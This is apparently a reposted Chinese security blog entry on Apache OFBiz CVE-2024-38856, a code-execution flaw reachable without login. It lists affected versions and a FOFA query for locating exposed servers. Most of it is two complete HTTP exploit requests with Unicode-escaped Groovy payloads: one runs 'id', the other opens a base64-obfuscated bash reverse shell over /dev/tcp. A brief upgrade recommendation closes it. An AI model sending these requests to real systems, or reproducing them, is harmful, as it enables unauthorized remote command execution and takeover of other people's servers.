漏洞描述:
Apache OFBiz是⼀个著名的电⼦商务平台,提供了创建基于最新 J2EE/ XML规范和技术标准,构建⼤中型企业级、跨平台、跨数据库、跨应⽤服务器的多层、分布式电⼦商务类WEB应⽤系统的框架。
2024年8月,互联网上披露了Apache OFBiz 授权不当致代码执行漏洞(CVE-2024-38856),该漏洞允许未经身份验证的远程攻击者通过特定的URL绕过安全检测机制执行恶意代码。攻击者可能利用该漏洞来执行恶意操作,包括但不限于获取敏感信息、修改数据或执行系统命令,最终可导致服务器失陷。
影响版本:
Apache OFBiz <= 18.12.14
fofa语法:
app="Apache_OFBiz"
漏洞复现:
执行ID payload:
POST /webtools/control/main/ProgramExport HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/x-www-form-urlencoded
groovyProgram=u0074u0068u0072u006fu0077u0020u006eu0065u0077u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu0028u0027u0069u0064u0027u002eu0065u0078u0065u0063u0075u0074u0065u0028u0029u002eu0074u0065u0078u0074u0029u003b
效果图: 反弹shell payload:
POST /webtools/control/main/ProgramExport HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/x-www-form-urlencoded
groovyProgram=u0022u0062u0061u0073u0068u0020u002Du0063u0020u007Bu0065u0063u0068u006Fu002Cu004Cu0032u004Au0070u0062u0069u0039u0069u0059u0058u004Eu006Fu0049u0043u0031u0070u0049u0044u0034u006Du0049u0043u0039u006Bu005Au0058u0059u0076u0064u0047u004Eu0077u004Cu007Au0045u0079u004Eu0079u0034u0077u004Cu006Au0041u0075u004Du0053u0038u0034u004Fu0044u0067u0034u0049u0044u0041u002Bu004Au006Au0045u003Du007Du007Cu007Bu0062u0061u0073u0065u0036u0034u002Cu002Du0064u007Du007Cu007Bu0062u0061u0073u0068u002Cu002Du0069u007Du0022u002Eu0065u0078u0065u0063u0075u0074u0065u0028u0029
效果图:
处置建议
目前官方已有可更新版本,建议受影响用户升级至最新版本:
Apache OFBiz >= 18.12.15
官方补丁下载地址:https://ofbiz.apache.org/download.html
原文始发于微信公众号(合规渗透):ApacheOFBiz - 最新0Day 含EXP 漏洞编号:CVE-2024-38856 速查速修复!
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论